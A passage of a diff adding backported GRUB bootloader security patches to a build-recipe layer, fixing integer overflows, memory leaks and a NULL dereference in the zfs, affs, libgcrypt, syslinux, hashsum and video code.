+@@ -2836,8 +2836,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ 
+       if (dnode_path->dn.dn.dn_type != DMU_OT_DIRECTORY_CONTENTS)
+ 	{
+-	  grub_free (path_buf);
+-	  return grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++	  err = grub_error (GRUB_ERR_BAD_FILE_TYPE, N_("not a directory"));
++	  break;
+ 	}
+       err = zap_lookup (&(dnode_path->dn), cname, &objnum,
+ 			data, subvol->case_insensitive);
+@@ -2879,11 +2879,18 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ 		       << SPA_MINBLOCKSHIFT);
+ 
+ 	      if (blksz == 0)
+-		return grub_error(GRUB_ERR_BAD_FS, "0-sized block");
++                {
++                  err = grub_error (GRUB_ERR_BAD_FS, "0-sized block");
++                  break;
++                }
+ 
+ 	      sym_value = grub_malloc (sym_sz);
+ 	      if (!sym_value)
+-		return grub_errno;
++		{
++		  err = grub_errno;
++		  break;
++		}
++
+ 	      for (block = 0; block < (sym_sz + blksz - 1) / blksz; block++)
+ 		{
+ 		  void *t;
+@@ -2893,7 +2900,7 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ 		  if (err)
+ 		    {
+ 		      grub_free (sym_value);
+-		      return err;
++		      break;
+ 		    }
+ 
+ 		  movesize = sym_sz - block * blksz;
+@@ -2903,6 +2910,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ 		  grub_memcpy (sym_value + block * blksz, t, movesize);
+ 		  grub_free (t);
+ 		}
++		if (err)
++		  break;
+ 	      free_symval = 1;
+ 	    }	    
+ 	  path = path_buf = grub_malloc (sym_sz + grub_strlen (oldpath) + 1);
+@@ -2911,7 +2920,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ 	      grub_free (oldpathbuf);
+ 	      if (free_symval)
+ 		grub_free (sym_value);
+-	      return grub_errno;
++	      err = grub_errno;
++	      break;
+ 	    }
+ 	  grub_memcpy (path, sym_value, sym_sz);
+ 	  if (free_symval)
+@@ -2949,11 +2959,12 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ 	      
+ 	      err = zio_read (bp, dnode_path->dn.endian, &sahdrp, NULL, data);
+ 	      if (err)
+-		return err;
++	        break;
+ 	    }
+ 	  else
+ 	    {
+-	      return grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++	      err = grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
++	      break;
+ 	    }
+ 
+ 	  hdrsize = SA_HDR_SIZE (((sa_hdr_phys_t *) sahdrp));
+@@ -2974,7 +2985,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
+ 	      if (!path_buf)
+ 		{
+ 		  grub_free (oldpathbuf);
+-		  return grub_errno;
++		  err = grub_errno;
++		  break;
+ 		}
+ 	      grub_memcpy (path, sym_value, sym_sz);
+ 	      path [sym_sz] = 0;
diff --git a/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
new file mode 100644
index 0000000000..8df758b41f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
@@ -0,0 +1,56 @@
+From ec35d862f3567671048aa0d0d8ad1ded1fd25336 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 22:17:04 +0000
+Subject: [PATCH] zfs: Fix possible integer overflows
+
+In all cases the problem is that the value being acted upon by
+a left-shift is a 32-bit number which is then being used in the
+context of a 64-bit number.
+
+To avoid overflow we ensure that the number being shifted is 64-bit
+before the shift is done.
+
+Fixes: CID 73684, CID 73695, CID 73764
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=302c12ff5714bc455949117c1c9548ccb324d55b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfs.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
+index 9087a72..b078ccc 100644
+--- a/grub-core/fs/zfs/zfs.c
++++ b/grub-core/fs/zfs/zfs.c
+@@ -564,7 +564,7 @@ find_bestub (uberblock_phys_t * ub_array,
+       ubptr = (uberblock_phys_t *) ((grub_properly_aligned_t *) ub_array
+ 				    + ((i << ub_shift)
+ 				       / sizeof (grub_properly_aligned_t)));
+-      err = uberblock_verify (ubptr, offset, 1 << ub_shift);
++      err = uberblock_verify (ubptr, offset, (grub_size_t) 1 << ub_shift);
+       if (err)
+ 	{
+ 	  grub_errno = GRUB_ERR_NONE;
+@@ -1543,7 +1543,7 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+ 
+ 	    high = grub_divmod64 ((offset >> desc->ashift) + c,
+ 				  desc->n_children, &devn);
+-	    csize = bsize << desc->ashift;
++	    csize = (grub_size_t) bsize << desc->ashift;
+ 	    if (csize > len)
+ 	      csize = len;
+ 
+@@ -1635,8 +1635,8 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
+ 
+ 	    while (len > 0)
+ 	      {
+-		grub_size_t csize;
+-		csize = ((s / (desc->n_children - desc->nparity))
++		grub_size_t csize = s;
++		csize = ((csize / (desc->n_children - desc->nparity))
+ 			 << desc->ashift);
+ 		if (csize > len)
+ 		  csize = len;
diff --git a/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
new file mode 100644
index 0000000000..555dc19168
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
@@ -0,0 +1,35 @@
+From b085da8efda9b81f94aa197ee045226563554fdf Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:56:45 +0000
+Subject: [PATCH] zfsinfo: Correct a check for error allocating memory
+
+While arguably the check for grub_errno is correct, we should really be
+checking the return value from the function since it is always possible
+that grub_errno was set elsewhere, making this code behave incorrectly.
+
+Fixes: CID 73668
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7aab03418ec6a9b991aa44416cb2585aff4e7972]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/zfs/zfsinfo.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/fs/zfs/zfsinfo.c b/grub-core/fs/zfs/zfsinfo.c
+index c8a28ac..bf29180 100644
+--- a/grub-core/fs/zfs/zfsinfo.c
++++ b/grub-core/fs/zfs/zfsinfo.c
+@@ -358,8 +358,8 @@ grub_cmd_zfs_bootfs (grub_command_t cmd __attribute__ ((unused)), int argc,
+     return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("one argument expected"));
+ 
+   devname = grub_file_get_device_name (args[0]);
+-  if (grub_errno)
+-    return grub_errno;
++  if (devname == NULL)
++    return GRUB_ERR_OUT_OF_MEMORY;
+ 
+   dev = grub_device_open (devname);
+   grub_free (devname);
diff --git a/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
new file mode 100644
index 0000000000..435130516c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
@@ -0,0 +1,82 @@
+From 929c2ce8214c53cb95abff57a89556cd18444097 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 12:48:07 +0000
+Subject: [PATCH] affs: Fix memory leaks
+
+The node structure reference is being allocated but not freed if it
+reaches the end of the function. If any of the hooks had returned
+a non-zero value, then node would have been copied in to the context
+reference, but otherwise node is not stored and should be freed.
+
+Similarly, the call to grub_affs_create_node() replaces the allocated
+memory in node with a newly allocated structure, leaking the existing
+memory pointed by node.
+
+Finally, when dir->parent is set, then we again replace node with newly
+allocated memory, which seems unnecessary when we copy in the values
+from dir->parent immediately after.
+
+Fixes: CID 73759
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=178ac5107389f8e5b32489d743d6824a5ebf342a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/fs/affs.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/grub-core/fs/affs.c b/grub-core/fs/affs.c
+index 220b371..230e26a 100644
+--- a/grub-core/fs/affs.c
++++ b/grub-core/fs/affs.c
+@@ -400,12 +400,12 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ {
+   unsigned int i;
+   struct grub_affs_file file;
+-  struct grub_fshelp_node *node = 0;
++  struct grub_fshelp_node *node, *orig_node;
+   struct grub_affs_data *data = dir->data;
+   grub_uint32_t *hashtable;
+ 
+   /* Create the directory entries for `.' and `..'.  */
+-  node = grub_zalloc (sizeof (*node));
++  node = orig_node = grub_zalloc (sizeof (*node));
+   if (!node)
+     return 1;
+     
+@@ -414,9 +414,6 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+     return 1;
+   if (dir->parent)
+     {
+-      node = grub_zalloc (sizeof (*node));
+-      if (!node)
+-	return 1;
+       *node = *dir->parent;
+       if (hook ("..", GRUB_FSHELP_DIR, node, hook_data))
+ 	return 1;
+@@ -456,17 +453,18 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
+ 
+ 	  if (grub_affs_create_node (dir, hook, hook_data, &node, &hashtable,
+ 				     next, &file))
+-	    return 1;
++	    {
++	      /* Node has been replaced in function. */
++	      grub_free (orig_node);
++	      return 1;
++	    }
+ 
+ 	  next = grub_be_to_cpu32 (file.next);
+ 	}
+     }
+ 
+-  grub_free (hashtable);
+-  return 0;
+-
+  fail:
+-  grub_free (node);
++  grub_free (orig_node);
+   grub_free (hashtable);
+   return 0;
+ }
diff --git a/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
new file mode 100644
index 0000000000..f500f1a296
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
@@ -0,0 +1,36 @@
+From 9b16d7bcad1c7fea7f26eb2fb3af1a5ca70ba34e Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 3 Nov 2020 16:43:37 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible unintended sign extension
+
+The array of unsigned char gets promoted to a signed 32-bit int before
+it is finally promoted to a size_t. There is the possibility that this
+may result in the signed-bit being set for the intermediate signed
+32-bit int. We should ensure that the promotion is to the correct type
+before we bitwise-OR the values.
+
+Fixes: CID 96697
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e8814c811132a70f9b55418f7567378a34ad3883]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index a3435ed..7ecad27 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -458,7 +458,7 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+       if (len && len < 4)
+         return gcry_error (GPG_ERR_TOO_SHORT);
+ 
+-      n = (s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3]);
++      n = ((size_t)s[0] << 24 | (size_t)s[1] << 16 | (size_t)s[2] << 8 | (size_t)s[3]);
+       s += 4;
+       if (len)
+         len -= 4;
diff --git a/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
new file mode 100644
index 0000000000..08299d021e
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
@@ -0,0 +1,33 @@
+From d26c8771293637b0465f2cb67d97cb58bacc62da Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 10:41:54 +0000
+Subject: [PATCH] libgcrypt/mpi: Fix possible NULL dereference
+
+The code in gcry_mpi_scan() assumes that buffer is not NULL, but there
+is no explicit check for that, so we add one.
+
+Fixes: CID 73757
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ae0f3fabeba7b393113d5dc185b6aff9b728136d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/libgcrypt/mpi/mpicoder.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+index 7ecad27..6fe3891 100644
+--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
++++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
+@@ -379,6 +379,9 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
+   unsigned int len;
+   int secure = (buffer && gcry_is_secure (buffer));
+ 
++  if (!buffer)
++    return gcry_error (GPG_ERR_INV_ARG);
++
+   if (format == GCRYMPI_FMT_SSH)
+     len = 0;
+   else
diff --git a/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
new file mode 100644
index 0000000000..d8c21d88f7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
@@ -0,0 +1,43 @@
+From ea12feb69b6af93c7e2fa03df7ac3bd1f4edd599 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 26 Nov 2020 15:31:53 +0000
+Subject: [PATCH] syslinux: Fix memory leak while parsing
+
+In syslinux_parse_real() the 2 points where return is being called
+didn't release the memory stored in buf which is no longer required.
+
+Fixes: CID 176634
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=95bc016dba94cab3d398dd74160665915cd08ad6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/syslinux_parse.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/syslinux_parse.c b/grub-core/lib/syslinux_parse.c
+index 4afa992..3acc6b4 100644
+--- a/grub-core/lib/syslinux_parse.c
++++ b/grub-core/lib/syslinux_parse.c
+@@ -737,7 +737,10 @@ syslinux_parse_real (struct syslinux_menu *menu)
+ 		  && grub_strncasecmp ("help", ptr3, ptr4 - ptr3) == 0))
+ 	    {
+ 	      if (helptext (ptr5, file, menu))
+-		return 1;
++		{
++		  grub_free (buf);
++		  return 1;
++		}
+ 	      continue;
+ 	    }
+ 
+@@ -757,6 +760,7 @@ syslinux_parse_real (struct syslinux_menu *menu)
+     }
+  fail:
+   grub_file_close (file);
++  grub_free (buf);
+   return err;
+ }
+ 
diff --git a/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
new file mode 100644
index 0000000000..8a26e5bc5b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
@@ -0,0 +1,52 @@
+From 2367049d2021e00d82d19cee923e06a4b04ebc30 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 4 Dec 2020 18:56:48 +0000
+Subject: [PATCH] normal/completion: Fix leaking of memory when processing a
+ completion
+
+It is possible for the code to reach the end of the function without
+freeing the memory allocated to argv and argc still to be 0.
+
+We should always call grub_free(argv). The grub_free() will handle
+a NULL argument correctly if it reaches that code without the memory
+being allocated.
+
+Fixes: CID 96672
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9213575b7a95b514bce80be5964a28d407d7d56d]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/normal/completion.c | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/grub-core/normal/completion.c b/grub-core/normal/completion.c
+index 5961028..46e473c 100644
+--- a/grub-core/normal/completion.c
++++ b/grub-core/normal/completion.c
+@@ -400,8 +400,8 @@ char *
+ grub_normal_do_completion (char *buf, int *restore,
+ 			   void (*hook) (const char *, grub_completion_type_t, int))
+ {
+-  int argc;
+-  char **argv;
++  int argc = 0;
++  char **argv = NULL;
+ 
+   /* Initialize variables.  */
+   match = 0;
+@@ -516,10 +516,8 @@ grub_normal_do_completion (char *buf, int *restore,
+ 
+  fail:
+   if (argc != 0)
+-    {
+-      grub_free (argv[0]);
+-      grub_free (argv);
+-    }
++    grub_free (argv[0]);
++  grub_free (argv);
+   grub_free (match);
+   grub_errno = GRUB_ERR_NONE;
+ 
diff --git a/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
new file mode 100644
index 0000000000..e34a19e12c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
@@ -0,0 +1,56 @@
+From b136fa14d26d1833ffcb852f86e65da5960cfb99 Mon Sep 17 00:00:00 2001
+From: Chris Coulson <chris.coulson@canonical.com>
+Date: Tue, 1 Dec 2020 23:41:24 +0000
+Subject: [PATCH] commands/hashsum: Fix a memory leak
+
+check_list() uses grub_file_getline(), which allocates a buffer.
+If the hash list file contains invalid lines, the function leaks
+this buffer when it returns an error.
+
+Fixes: CID 176635
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b6f528e52e18b7a69f90b8dc3671d7b1147d9f3]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hashsum.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hashsum.c b/grub-core/commands/hashsum.c
+index 456ba90..b8a22b0 100644
+--- a/grub-core/commands/hashsum.c
++++ b/grub-core/commands/hashsum.c
+@@ -128,11 +128,17 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+ 	  high = hextoval (*p++);
+ 	  low = hextoval (*p++);
+ 	  if (high < 0 || low < 0)
+-	    return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++	    {
++	      grub_free (buf);
++	      return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++	    }
+ 	  expected[i] = (high << 4) | low;
+ 	}
+       if ((p[0] != ' ' && p[0] != '\t') || (p[1] != ' ' && p[1] != '\t'))
+-	return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++	{
++	  grub_free (buf);
++	  return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
++	}
+       p += 2;
+       if (prefix)
+ 	{
+@@ -140,7 +146,10 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
+ 	  
+ 	  filename = grub_xasprintf ("%s/%s", prefix, p);
+ 	  if (!filename)
+-	    return grub_errno;
++	    {
++	      grub_free (buf);
++	      return grub_errno;
++	    }
+ 	  file = grub_file_open (filename, GRUB_FILE_TYPE_TO_HASH
+ 				 | (!uncompress ? GRUB_FILE_TYPE_NO_DECOMPRESS
+ 				    : GRUB_FILE_TYPE_NONE));
diff --git a/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
new file mode 100644
index 0000000000..7e4e951245
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
@@ -0,0 +1,94 @@
+From 2a1e5659763790201a342f8a897c8c9d8d91b1cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 21:14:31 +0000
+Subject: [PATCH] video/efi_gop: Remove unnecessary return value of
+ grub_video_gop_fill_mode_info()
+
+The return value of grub_video_gop_fill_mode_info() is never able to be
+anything other than GRUB_ERR_NONE. So, rather than continue to return
+a value and checking it each time, it is more correct to redefine the
+function to not return anything and remove checks of its return value
+altogether.
+
+Fixes: CID 96701
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fc5951d3b1616055ef81a019a5affc09d13344d0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/efi_gop.c | 25 ++++++-------------------
+ 1 file changed, 6 insertions(+), 19 deletions(-)
+
+diff --git a/grub-core/video/efi_gop.c b/grub-core/video/efi_gop.c
+index 7f9d1c2..db2ee98 100644
+--- a/grub-core/video/efi_gop.c
++++ b/grub-core/video/efi_gop.c
+@@ -227,7 +227,7 @@ grub_video_gop_fill_real_mode_info (unsigned mode,
+   return GRUB_ERR_NONE;
+ }
+ 
+-static grub_err_t
++static void
+ grub_video_gop_fill_mode_info (unsigned mode,
+ 			       struct grub_efi_gop_mode_info *in,
+ 			       struct grub_video_mode_info *out)
+@@ -252,8 +252,6 @@ grub_video_gop_fill_mode_info (unsigned mode,
+   out->blit_format = GRUB_VIDEO_BLIT_FORMAT_BGRA_8888;
+   out->mode_type |= (GRUB_VIDEO_MODE_TYPE_DOUBLE_BUFFERED
+ 		     | GRUB_VIDEO_MODE_TYPE_UPDATING_SWAP);
+-
+-  return GRUB_ERR_NONE;
+ }
+ 
+ static int
+@@ -266,7 +264,6 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+       grub_efi_uintn_t size;
+       grub_efi_status_t status;
+       struct grub_efi_gop_mode_info *info = NULL;
+-      grub_err_t err;
+       struct grub_video_mode_info mode_info;
+ 	 
+       status = efi_call_4 (gop->query_mode, gop, mode, &size, &info);
+@@ -277,12 +274,7 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
+ 	  continue;
+ 	}
+ 
+-      err = grub_video_gop_fill_mode_info (mode, info, &mode_info);
+-      if (err)
+-	{
+-	  grub_errno = GRUB_ERR_NONE;
+-	  continue;
+-	}
++      grub_video_gop_fill_mode_info (mode, info, &mode_info);
+       if (hook (&mode_info, hook_arg))
+ 	return 1;
+     }
+@@ -466,13 +458,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+ 
+   info = gop->mode->info;
+ 
+-  err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+-				       &framebuffer.mode_info);
+-  if (err)
+-    {
+-      grub_dprintf ("video", "GOP: couldn't fill mode info\n");
+-      return err;
+-    }
++  grub_video_gop_fill_mode_info (gop->mode->mode, info,
++				 &framebuffer.mode_info);
+ 
+   framebuffer.ptr = (void *) (grub_addr_t) gop->mode->fb_base;
+   framebuffer.offscreen
+@@ -486,8 +473,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
+     {
+       grub_dprintf ("video", "GOP: couldn't allocate shadow\n");
+       grub_errno = 0;
+-      err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
+-					   &framebuffer.mode_info);
++      grub_video_gop_fill_mode_info (gop->mode->mode, info,
++				     &framebuffer.mode_info);
+       buffer = framebuffer.ptr;
+     }
+     
diff --git a/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..8165ea3f71
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
@@ -0,0 +1,78 @@
+From 99ecf5a44b99d529a6405fe276bedcefa3657a0a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 4 Nov 2020 15:10:51 +0000
+Subject: [PATCH] video/fb/fbfill: Fix potential integer overflow
+
+The multiplication of 2 unsigned 32-bit integers may overflow before
+promotion to unsigned 64-bit. We should ensure that the multiplication
+is done with overflow detection. Additionally, use grub_sub() for
+subtraction.
+
+Fixes: CID 73640, CID 73697, CID 73702, CID 73823
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7ce3259f67ac2cd93acb0ec0080c24b3b69e66c6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/video/fb/fbfill.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/video/fb/fbfill.c b/grub-core/video/fb/fbfill.c
+index 11816d0..a37acd1 100644
+--- a/grub-core/video/fb/fbfill.c
++++ b/grub-core/video/fb/fbfill.c
+@@ -31,6 +31,7 @@
+ #include <grub/fbfill.h>
+ #include <grub/fbutil.h>
+ #include <grub/types.h>
++#include <grub/safemath.h>
+ #include <grub/video.h>
+ 
+ /* Generic filler that works for every supported mode.  */
+@@ -61,7 +62,9 @@ grub_video_fbfill_direct32 (struct grub_video_fbblit_info *dst,
+ 
+   /* Calculate the number of bytes to advance from the end of one line
+      to the beginning of the next line.  */
+-  rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++  if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++      grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++    return;
+ 
+   /* Get the start address.  */
+   dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -98,7 +101,9 @@ grub_video_fbfill_direct24 (struct grub_video_fbblit_info *dst,
+ #endif
+   /* Calculate the number of bytes to advance from the end of one line
+      to the beginning of the next line.  */
+-  rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++  if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++      grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++    return;
+ 
+   /* Get the start address.  */
+   dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -131,7 +136,9 @@ grub_video_fbfill_direct16 (struct grub_video_fbblit_info *dst,
+ 
+   /* Calculate the number of bytes to advance from the end of one line
+      to the beginning of the next line.  */
+-  rowskip = (dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width);
++  if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++      grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++    return;
+ 
+   /* Get the start address.  */
+   dstptr = grub_video_fb_get_video_ptr (dst, x, y);
+@@ -161,7 +168,9 @@ grub_video_fbfill_direct8 (struct grub_video_fbblit_info *dst,
+ 
+   /* Calculate the number of bytes to advance from the end of one line
+      to the beginning of the next line.  */
+-  rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
++  if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
++      grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
++    return;
+ 
+   /* Get the start address.  */
+   dstptr = grub_video_fb_get_video_ptr (dst, x, y);
diff --git a/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
new file mode 100644
index 0000000000..544e7f31ae
--- /dev/null
